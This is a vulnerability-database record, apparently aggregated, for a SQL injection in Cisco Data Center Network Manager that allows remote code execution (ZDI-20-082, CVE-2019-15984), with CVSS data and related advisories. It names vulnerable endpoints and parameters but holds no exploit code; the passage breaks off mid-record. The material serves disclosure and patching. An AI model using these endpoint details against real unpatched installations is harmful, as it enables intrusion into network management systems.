Cisco Data Center Network Manager getSanSwitchBandwidthStatList SQL Injection Remote Code Execution Vulnerability

2020-01-03T00:00:00

Description

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getSwitchBandwidthStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.

{"id": "ZDI-20-082", "vendorId": null, "type": "zdi", "bulletinFamily": "info", "title": "Cisco Data Center Network Manager getSanSwitchBandwidthStatList SQL Injection Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getSwitchBandwidthStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "published": "2020-01-03T00:00:00", "modified": "2020-01-03T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-082/", "reporter": "Steven Seeley (mr_me) of Source Incite", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject"], "cvelist": ["CVE-2019-15984"], "immutableFields": [], "lastseen": "2022-02-10T00:00:00", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2019-2093"]}, {"type": "cisco", "idList": ["CISCO-SA-20200102-DCNM-SQL-INJECT"]}, {"type": "cve", "idList": ["CVE-2019-15984"]}, {"type": "exploitdb", "idList": ["EDB-ID:48019"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F778AD5D626855F4BE149B4B8F57874E"]}, {"type": "nessus", "idList": ["CISCO-SA-20200102-DCNM.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156239"]}, {"type": "srcincite", "idList": ["SRC-2020-0001", "SRC-2020-0003", "SRC-2020-0004", "SRC-2020-0005", "SRC-2020-0006"]}, {"type": "zdi", "idList": ["ZDI-20-016", "ZDI-20-017", "ZDI-20-018", "ZDI-20-019", "ZDI-20-020", "ZDI-20-021", "ZDI-20-022", "ZDI-20-023", "ZDI-20-024", "ZDI-20-025", "ZDI-20-026", "ZDI-20-027", "ZDI-20-028", "ZDI-20-029", "ZDI-20-030", "ZDI-20-031", "ZDI-20-032", "ZDI-20-033", "ZDI-20-034", "ZDI-20-035", "ZDI-20-036", "ZDI-20-037", "ZDI-20-038", "ZDI-20-039", "ZDI-20-040", "ZDI-20-041", "ZDI-20-042", "ZDI-20-043", "ZDI-20-044", "ZDI-20-045", "ZDI-20-046", "ZDI-20-047", "ZDI-20-048", "ZDI-20-049", "ZDI-20-050", "ZDI-20-051", "ZDI-20-052", "ZDI-20-053", "ZDI-20-054", "ZDI-20-055", "ZDI-20-056", "ZDI-20-057", "ZDI-20-058", "ZDI-20-059", "ZDI-20-060", "ZDI-20-063", "ZDI-20-064", "ZDI-20-065", "ZDI-20-066", "ZDI-20-067", "ZDI-20-068", "ZDI-20-069", "ZDI-20-070", "ZDI-20-071", "ZDI-20-072", "ZDI-20-073", "ZDI-20-074", "ZDI-20-075", "ZDI-20-076", "ZDI-20-077", "ZDI-20-078", "ZDI-20-079", "ZDI-20-080", "ZDI-20-081", "ZDI-20-083", "ZDI-20-084", "ZDI-20-085", "ZDI-20-086", "ZDI-20-087", "ZDI-20-088", "ZDI-20-089", "ZDI-20-090", "ZDI-20-091", "ZDI-20-092", "ZDI-20-093", "ZDI-20-094", "ZDI-20-095", "ZDI-20-096", "ZDI-20-097", "ZDI-20-098", "ZDI-20-099", "ZDI-20-104", "ZDI-20-105", "ZDI-20-106", "ZDI-20-107", "ZDI-20-108", "ZDI-20-109", "ZDI-20-110", "ZDI-20-111", "ZDI-20-112", "ZDI-20-113", "ZDI-20-115", "ZDI-20-116", "ZDI-20-121"]}, {"type": "zdt", "idList": ["1337DAY-ID-33920"]}]}, "score": {"value": 4.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2019-2093"]}, {"type": "cisco", "idList": ["CISCO-SA-20200102-DCNM-SQL-INJECT"]}, {"type": "cve", "idList": ["CVE-2019-15984"]}, {"type": "exploitdb", "idList": ["EDB-ID:48019"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F778AD5D626855F4BE149B4B8F57874E"]}, {"type": "nessus", "idList": ["CISCO-SA-20200102-DCNM.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156239"]}, {"type": "srcincite", "idList": ["SRC-2020-0001", "SRC-2020-0003", "SRC-2020-0004", "SRC-2020-0005", "SRC-2020-0006"]}, {"type": "zdi", "idList": ["ZDI-20-016", "ZDI-20-017", "ZDI-20-018", "ZDI-20-019", "ZDI-20-020", "ZDI-20-021", "ZDI-20-022", "ZDI-20-023", "ZDI-20-024", "ZDI-20-025", "ZDI-20-026", "ZDI-20-027", "ZDI-20-028", "ZDI-20-029", "ZDI-20-030", "ZDI-20-031", "ZDI-20-032", "ZDI-20-033", "ZDI-20-034", "ZDI-20-035", "ZDI-20-036", "ZDI-20-037", "ZDI-20-038", "ZDI-20-039", "ZDI-20-040", "ZDI-20-041", "ZDI-20-042", "ZDI-20-043", "ZDI-20-044", "ZDI-20-045", "ZDI-20-046", "ZDI-20-047", "ZDI-20-048", "ZDI-20-049", "ZDI-20-050", "ZDI-20-051", "ZDI-20-052", "ZDI-20-053", "ZDI-20-054", "ZDI-20-055", "ZDI-20-056", "ZDI-20-057", "ZDI-20-058", "ZDI-20-059", "ZDI-20-060", "ZDI-20-063", "ZDI-20-064", "ZDI-20-065", "ZDI-20-066", "ZDI-20-067", "ZDI-20-068", "ZDI-20-069", "ZDI-20-070", "ZDI-20-071", "ZDI-20-072", "ZDI-20-073", "ZDI-20-074", "ZDI-20-075", "ZDI-20-076", "ZDI-20-077", "ZDI-20-078", "ZDI-20-079", "ZDI-20-080", "ZDI-20-081", "ZDI-20-083", "ZDI-20-084", "ZDI-20-085", "ZDI-20-086", "ZDI-20-087", "ZDI-20-088", "ZDI-20-089", "ZDI-20-090", "ZDI-20-091", "ZDI-20-092", "ZDI-20-093", "ZDI-20-094", "ZDI-20-095", "ZDI-20-096", "ZDI-20-097", "ZDI-20-098", "ZDI-20-099", "ZDI-20-104", "ZDI-20-105", "ZDI-20-106", "ZDI-20-107", "ZDI-20-108", "ZDI-20-109", "ZDI-20-110", "ZDI-20-111", "ZDI-20-112", "ZDI-20-113", "ZDI-20-115", "ZDI-20-116", "ZDI-20-121"]}, {"type": "zdt", "idList": ["1337DAY-ID-33920"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-15984", "epss": "0.406150000", "percentile": "0.966420000", "modified": "2023-03-15"}], "vulnersScore": 4.0}, "_state": {"dependencies": 1659956084, "score": 1659957065, "epss": 1678948994}, "_internal": {"score_hash": "ba15a381528f3400ace3e7b0b0cbd666"}}

{"cve": [{"lastseen": "2023-02-08T15:40:24", "description": "Multiple vulnerabilities in the REST and SOAP API endpoints of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to execute arbitrary SQL commands on an affected device. To exploit these vulnerabilities, an attacker would need administrative privileges on the DCNM application. For more information about these vulnerabilities, see the Details section of this advisory. Note: The severity of these vulnerabilities is aggravated by the vulnerabilities described in the Cisco Data Center Network Manager Authentication Bypass Vulnerabilities advisory, published simultaneously with this one.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-06T08:15:00", "type": "cve", "title": "CVE-2019-15984", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2023-02-02T19:19:00", "cpe": [], "id": "CVE-2019-15984", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15984", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": []}], "srcincite": [{"lastseen": "2022-04-20T17:15:54", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of requests to the fm/fmrest/lanConfig/deleteCredentials endpoint. When parsing the switchIds parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nCisco\n\n**Affected Products:**\n\nData Center Network Manager\n\n**Vendor Response:**\n\nCisco has issued an update to correct this vulnerability. More details can be found at: \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-29T00:00:00", "type": "srcincite", "title": "SRC-2020-0005 : Cisco Data Center Network Manager ConfigTemplateHandler getConfigTemplateJobInstance SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "SRC-2020-0005", "href": "https://srcincite.io/advisories/src-2020-0005/", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": ""}, {"lastseen": "2022-04-20T17:15:55", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of requests to the rest/smu/getjobs endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nCisco\n\n**Affected Products:**\n\nData Center Network Manager\n\n**Vendor Response:**\n\nCisco has issued an update to correct this vulnerability. More details can be found at: \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-29T00:00:00", "type": "srcincite", "title": "SRC-2020-0003 : Cisco Data Center Network Manager SMUJobController getSMUTasks SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "SRC-2020-0003", "href": "https://srcincite.io/advisories/src-2020-0003/", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": ""}, {"lastseen": "2022-04-20T17:15:56", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of requests to the fm/fmrest/health/sqlCommandAPI endpoint. When parsing the queryString parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nCisco\n\n**Affected Products:**\n\nData Center Network Manager\n\n**Vendor Response:**\n\nCisco has issued an update to correct this vulnerability. More details can be found at: \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-29T00:00:00", "type": "srcincite", "title": "SRC-2020-0001 : Cisco Data Center Network Manager HealthRest sqlCommandAPI Arbitrary SQL Execution Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "SRC-2020-0001", "href": "https://srcincite.io/advisories/src-2020-0001/", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": ""}, {"lastseen": "2022-04-20T17:15:54", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of requests to the getPortMappingDataLength endpoint of the PortMapperWS service. When parsing the colFilterStr parameter in the getPortMappingDataLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.\n\n**Affected Vendors:**\n\nCisco\n\n**Affected Products:**\n\nData Center Network Manager\n\n**Vendor Response:**\n\nCisco has issued an update to correct this vulnerability. More details can be found at: \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-20T00:00:00", "type": "srcincite", "title": "SRC-2020-0006 : Cisco Data Center Network Manager PortMapperHandler getPortMappingDataLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "SRC-2020-0006", "href": "https://srcincite.io/advisories/src-2020-0006/", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": ""}, {"lastseen": "2022-04-20T17:15:55", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of requests to the fm/fmrest/lanConfig/deleteCredentials endpoint. When parsing the switchIds parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nCisco\n\n**Affected Products:**\n\nData Center Network Manager\n\n**Vendor Response:**\n\nCisco has issued an update to correct this vulnerability. More details can be found at: \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-29T00:00:00", "type": "srcincite", "title": "SRC-2020-0004 : Cisco Data Center Network Manager SwitchCredentialsHandler deleteCredentials SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "SRC-2020-0004", "href": "https://srcincite.io/advisories/src-2020-0004/", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": ""}], "zdi": [{"lastseen": "2022-01-31T22:11:36", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/lanIslStat endpoint. When parsing the searchId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanIslStatListES SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-049", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-049/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:18", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter of the printSwitchTable endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanSwitchListWithoutUsedPorts SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-071", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-071/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:37", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/endportStat endpoint. When parsing the searchId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getEndDeviceStatListESBySQL SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-041", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-041/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:42", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/config/templates endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getAllTemplate SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-030", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-030/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:41", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/getHostEnclList endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 